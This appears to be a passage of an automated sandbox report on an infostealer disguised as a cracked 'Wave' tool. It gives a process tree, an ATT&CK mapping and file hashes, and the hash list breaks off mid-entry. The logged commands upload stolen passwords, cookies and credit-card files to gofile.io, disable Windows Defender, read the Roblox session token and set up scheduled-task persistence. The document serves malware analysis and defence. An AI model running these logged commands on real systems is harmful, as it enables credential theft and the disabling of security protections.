- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
  2⤵
  PID:6040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6012 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2388
- C:\Users\Admin\Downloads\winrar-x64-701.exe
  "C:\Users\Admin\Downloads\winrar-x64-701.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1696 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2408 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3056

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1396

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4cc 0x2fc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\df048ba537e0411ca05e197e0c992e74 /t 5384 /p 5392
1⤵
PID:2012

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1012

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:748

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a53a1a2d376646178e4699a706b65ce8 /t 4612 /p 748
1⤵
PID:5928

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Wave\" -spe -an -ai#7zMap18909:70:7zEvent23364
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1872

C:\Users\Admin\Downloads\Wave\WaveCrack.exe
"C:\Users\Admin\Downloads\Wave\WaveCrack.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4028
- C:\Users\Admin\AppData\Roaming\WaveCrack.sfx.exe
  "C:\Users\Admin\AppData\Roaming\WaveCrack.sfx.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4500
- - C:\Users\Admin\AppData\Roaming\WaveCrack.exe
    "C:\Users\Admin\AppData\Roaming\WaveCrack.exe"
    3⤵
    - Executes dropped EXE
    PID:5724
  - - C:\Users\Admin\AppData\Roaming\WaveCrack.exe
      "C:\Users\Admin\AppData\Roaming\WaveCrack.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      PID:5036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h Cracked.exe"
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:5928
      - C:\Windows\system32\attrib.exe
        
        attrib +h Cracked.exe
        6⤵
        Views/modifies file attributes
        
        PID:4324
    - - C:\Users\Admin\AppData\Roaming\Cracked.exe
        
        "C:\Users\Admin\AppData\Roaming\Cracked.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2224
      - C:\Users\Admin\AppData\Local\Temp\Steam.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "SteamClient" /sc ONLOGON /tr "C:\Program Files\%appdata%\Steam.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4752
        
        C:\Program Files\%appdata%\Steam.exe
        
        "C:\Program Files\%appdata%\Steam.exe"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4052
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "SteamClient" /sc ONLOGON /tr "C:\Program Files\%appdata%\Steam.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5552
      - C:\Users\Admin\AppData\Local\Temp\Skype.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Skype.exe"
        6⤵
        Executes dropped EXE
        
        PID:212
        
        C:\Users\Admin\AppData\Local\Temp\Skype.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Skype.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:1272
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        9⤵
        
        PID:3116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:1508
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
        9⤵
        
        PID:3132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:2508
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
        9⤵
        
        PID:5124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:1328
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
        9⤵
        
        PID:5928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:4572
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile
        9⤵
        
        PID:5696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:4408
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store4.gofile.io/uploadFile
        9⤵
        
        PID:5232
      - C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\OneDrive.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:4060
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:3760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1880
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:5672
- C:\Users\Admin\AppData\Roaming\WaveWindows.exe
  "C:\Users\Admin\AppData\Roaming\WaveWindows.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3472
- - C:\Users\Admin\AppData\Local\Luau Language Server\node.exe
    "C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=3472
    3⤵
    - Executes dropped EXE
    PID:4708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
75c9f57baeefeecd6c184627de951c1e

SHA1
52e0468e13cbfc9f15fc62cc27ce14367a996cff

SHA256
648ba270261690bb792f95d017e134d81a612ef4fc76dc41921c9e5b8f46d98f

SHA512
c4570cc4bb4894de3ecc8eee6cd8bfa5809ea401ceef683557fb170175ff4294cc21cdc6834db4e79e5e82d3bf16105894fff83290d26343423324bc486d4a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
10fa19df148444a77ceec60cabd2ce21

SHA1
685b599c497668166ede4945d8885d204fd8d70f

SHA256
c3b5deb970d0f06a05c8111da90330ffe25da195aafa4e182211669484d1964b

SHA512
3518ce16fef66c59e0bdb772db51aeaa9042c44ca399be61ca3d9979351f93655393236711cf2b1988d5f90a5b9318a7569a8cef3374fc745a8f9aa8323691ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
1fcb1c33e009ad39b174e3cc450b3371

SHA1
3534fc1452f43ca816ba357fff6aa1d6959b48c2

SHA256
871a94f87f5fba8c3ddb29c22f5942f03df4a36e6bdc6ced13f84bd6fb3a10a4

SHA512
685fe8938c69d9aaf1ce3e82ce65a97191f18fb02a44dd989518ccd2d30b96a054232f5bf8723945da42c87d7a4d465dd43b44859a2fc20c007a89a409173e23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
c41bf35cad7c6bc511654107b0daa256

SHA1
99d34c62abc4845389139f88313751c24753f1da

SHA256
9590a092924b025ee4fe606bf93bf91749feee1b006185c3a82942faef836966

SHA512
b0252d95de248911ddf4ae42568b57bd525f06171661537a34c2676ef975dbfc069f377cc2048c323b8ad1855ceba80d82ba29920b7199323326133cc6f5cd60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\00\00000000

Filesize
4.5MB

MD5
09adfe9135f1409d79e9a4c6bb3daccd

SHA1
d267af75b5111bfe965b089d65273b76a836d944

SHA256
6ff0f11a16898da3af19a902b72b3c48d19568c7c0517c55e40d563745409301

SHA512
e2f2e315f8aecae7d7008b9944f5edc881a6491b65e2e91bc4517d7be385f0b0d5a5addf97bc2e8a6a394e2caaf475eb9d33db6e0c5e7e089cd90cf25e4a8571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\000003.log

Filesize
13KB

MD5
d93efc956d6559915d3323aa8e0aba3f

SHA1
73195f4b4087817866604dd428802b825c8f5dd3

SHA256
4c7ff2d95c322b7e993399e501c547319ee4b61c7780aaccf16877fe58405025

SHA512
e9b4d61d563b9c7cbfe31846b218b37eb1ccda5fde161fa997f96cfcc98e553845e6e461ad1707ecda0dae846da60d46bd9869adb30c7d77e88158eea9ad0ddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old

Filesize
375B

MD5
70ca359859611093767acbc5cf9882e3

SHA1
c126e21c928b97f7f1ae7e3b4ec15f7c78fad490

SHA256
edede44906fb82047149848b49cc7a54521cb8300571ee5945631c4b44e910da

SHA512
57cc99b6441bc26385fc50f6c99694153f40f64f92d7735c04f7f8bb2eb125e981d0d20e338986c8360fed1f7136c4b8a688facff0d35766dfc2653fbb5eb9ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old

Filesize
372B

MD5
f5ba1a4ad3aa20a62c6ccf9d24fa0ea2

SHA1
83e4dd47ce2b105c7816eaf6c63673b35f1523ae

SHA256
4c09ee18adab0c1430d6b3708900f6c4be4015eb552e621fe8a413b13b418f40

SHA512
23239df1977192f2e95a90ce87a2407d456ce61ae97dcfffa99c4bfd6f443413a5c276ad2bb5165aa6f1e6fcb116b527e231e3e485bc5b28116a9a3db50a37e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old

Filesize
375B

MD5
8c9b1ada01211439ab257f4f62839c6c

SHA1
a1819ca7a585c485c3a36aaec03f51250b25588b

SHA256
1e91e589b9b62efa7611b318ddd0fb58b7ed8090149694157e98c110b55fbf12

SHA512
eba4d1d04f1a4c4caf7e0528f4dbf57f0c8b925f656b199149e3372ab932b03169a38b9846aa5731fede7378591ba8a396bb138cc428de2de15f7c228513660b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old~RFe57dcf2.TMP

Filesize
333B

MD5
d55e0aab76c12f2dcd6af0462b9c6888

SHA1
66cc6fafbc4bed5677f47814794eb7f9f551eef4

SHA256
de0f8810446db5a6213f23b7157965c04a1ed90bf2ca6e9b0d4be5259629689b

SHA512
0b9a708e71c1253e006b8c62d9bca21730fb9496c08e96586fa753d69ae891b8f8bfad1ef8a39f563f45ea77dba99341428169436d61af7f6bf6161a6fbe2549

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
627B

MD5
73d74b138aa6e21b79b5484f26ddd87a

SHA1
3960e5f7267e8147a2088c90c49320ad236bc787

SHA256
5ac6ca0c0f9c509b08928596f1f9d2da6a93deb294a8e25275b950c51fc8e422

SHA512
3e5477f15b603c9612209447a1749377feb33cd4eec1c4b0b9fe5cee5a3e2f854fdfe73200576a9824e3d19e7e430f9a7a40682e54d869aa00842b6096286a1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ede0bd2ba345075daf6c542e18b4d317

SHA1
f60ee591710ae9f984afd9ea12752a31d0fbba44

SHA256
f77f6788aa43d444f942c9058ee54bc98b3d392c03110936e4e939070c80a878

SHA512
4ee31f63d5e502e253a822e8dd99f1d43809bf82b8aef0ac5e61577503eb17f5c9976473799598456f829c89d3cca2d439d2509d20f64502cc25fcfa1a9dcec1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bcf6b01ba2eb088e54a85429dcc57e96

SHA1
1d1833dba025c8918f660a520ba5bf87e504d5a2

SHA256
3dda22315c69e7b51492c930a69680480765207e02ae13db9185fee9195ca7ad

SHA512
d9542e62495599b2f162c828559fed26e6ffaf5f60629d6c8206cf14d9d4eea66a8389afa08a00db9fe1a68684fe969bdd93eebce7ad22e0d0b2d3902a781ecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ac466c77d5f25a86a8de11f1bfea4062

SHA1
d498e86599c0203c3f86b86a15a5d121fc990149

SHA256
904ca3790b3d5e8f7a8f0b9944bb3fbff5b5eb8f60fedb4385b07c22d36da16f

SHA512
1bd53cd3b78cdabb6bb072df358161998156d146cee4bd79e03fca76457341ca78935560e72efc75a43cebae4680daf897f8a92f0007d1f959a34852c744b7ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c43c1c1e0e81d50100d56bea45f3a60e

SHA1
db0b785e788b3dcbe395efb065a8af9d1ccca935

SHA256
72fd5c56501314d7887196f3535a86baab3cc00b60e55b04ccd2755566ab8444

SHA512
afce3ea33694f9edb96c7c9f54230236e9df294b35cddebf46b5d700af9e00732887c327509fa7139f6e383b3ef8da4f9d06f6999af5a616232dd5ab6d0eca32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
45bbc40a913739f15085ea60cf0fb496

SHA1
1a941377097fca6e1fd9c4a1cbded2a4638171f2

SHA256
59bffc263c7af9d61f390d43ea51d7ada206001344fedd85de4c0c882454271b

SHA512
39d5f3428c7f840af3542f10445e83bcb18967663818685c4a7b4e0c9d10cf6ea474701b253303de28e9ee21fb38a6b3b4e63b6de77a348ec6354f7a589a30bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
f7d9dafe4daa2ee147be91fe75cbfbc0

SHA1
456490b946caf6adf9cd9e17f997be7040073232

SHA256
15363a905c90971ee5709e801a06211618ce31a104b53d64ff85ae5dec02e13c

SHA512
9a076825c68ac3b0bb2c8a4b813fc11be2ef2b84c931767560f23cb1a798de8eaffc2f0a8f06ba0cdd858d74ec723910d94b598d6815aeb781f617e6d66b1927

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
d1754cf242e224c91f794082b3e32aac

SHA1
847de599f3f7c1fc177fb64ae7ee111c5d1b01e6

SHA256
235f1401e969141fdda77390bcb560939248df0794a1365f10280925c76ad6e2

SHA512
06aa921de9463b6b06ec09e388e143d6489112de5ed2c0e7017e589a91eaee3d4ba891651935007f82e1aeec378cc13bc15832a4adb216f10a7d13025b7458bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580d97.TMP

Filesize
48B

MD5
de20ea65714e0716a458c62fed64adcc

SHA1
4590352fd9836f464e7908781ad4b669881d205c

SHA256
4a51a200c2c0bfac791c0f93b4fe7c1f14638387fe56d5349ee964d2945ae566

SHA512
db789a4c7c4dee8c09c2ebf37ae10b99f971fc19a4d4e264f2e40f1bb451dfc7bf258b475b3c2a606c86f3a637d34bbfe34bbfb3b522331a235c5d5007567cbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
872B

MD5
2dcd5d1c935c11b68de39ce5363de92b

SHA1
b3ca035ffd85019e9f9722d0fa39b5562c3b9a3c

SHA256
352e7d8a91a7c56d9ced10eee7ac36bcb4d251e26714da815e5c0edd3c44d714

SHA512
bf89ec2edf85371a123bd898dc0a25d8b6d513745393995ab34b54dcfff0171081091458af2b20e12b86cacca1cc3e77b1c90664ccdbac245ca440b14cce6709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
872B

MD5
6207129011d0513afd0fb52b8db2ca50

SHA1
f82036e2f07c0bfb8fde5be4197d15d491c47ea0

SHA256
bef696c2aa96b6ea8e902c86b8d302c88f43655a7736543aed6b5572fe58451c

SHA512
fd9f5b3bf53506494c4b943e744a45c186ccc7f7ef3f1408f9f857bdfa6ced3a5d6a758fcf6ae9b3126458df3d23ea3ba995bc6870563381484ec8db846a3155

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe584699.TMP

Filesize
203B

MD5
c5d1e9522b78d3bdc0be2d2ab14a122c

SHA1
3f92855a29ed1081a057405a87431b9ffde5d2c5

SHA256
f94b63bb234edf5369d2f8e25defc908b6c369ac2b2cfe218027a35bfe6da82f

SHA512
622c5a49764b41923e86021c16937be786f89fca322624a789a8d40f19282a80e365406068e82534d010ee39628862133cc5dd12dc64d5866b3141d61aba6b6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
28b0016b786131adeb85659cdd5e51ee

SHA1
06b33a7f996ae3cf238fbf57908c259175b0b986

SHA256
62eddd6a8f56004e068ec468ab6a48bdfa5df6b53d00e7786078231f5c520275

SHA512
52646b5d6c7000ce5a2ab02c9c0c1e222f07d2b6aa9a24b4df17a165e781e137c77a9c330ee6b844ac8ba2d94284f3f81d2b49e00cc712bb7e9699fbd01bff73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8d28ada625c2687a46fe7f6d928248cb

SHA1
5e12fb3be48d4d18b06a04f9315c4fe31cb006d6

SHA256
15cb33b72f32d4f194f310c1cdc64216a5b24e40c8e34a1ac08d5eed637525be

SHA512
54480ac48d21011f8e83f72e0f1d82155e756baff6e83a4cc61c778c783b576ef62f38a4e07f7f8a92482a389a5a666f5ce729c0f108a0ba46c59839022982cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
61fef5192536216b76559ada229313d9

SHA1
7672ecc2741192ef2ed7964671dd3dd28c8a8732

SHA256
232f9e82d8dd37e0377d82e8643f2073cf251fdd746dce511ffa59c068c2823d

SHA512
c5c4aec17ba585ff42d98b86558328652a0cf009e2057048ef641144ec8e9482599d3c36084a2633ab2d795ed077d26beaf29800b9a8b945ad6f935197a8bbb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\OneDrive.exe

Filesize
327KB

MD5
7d3955e66a88fd0c94df6bee2fd23aa9

SHA1
3dc50ac34c3896d405dc23e1bfbec4c51073b82e

SHA256
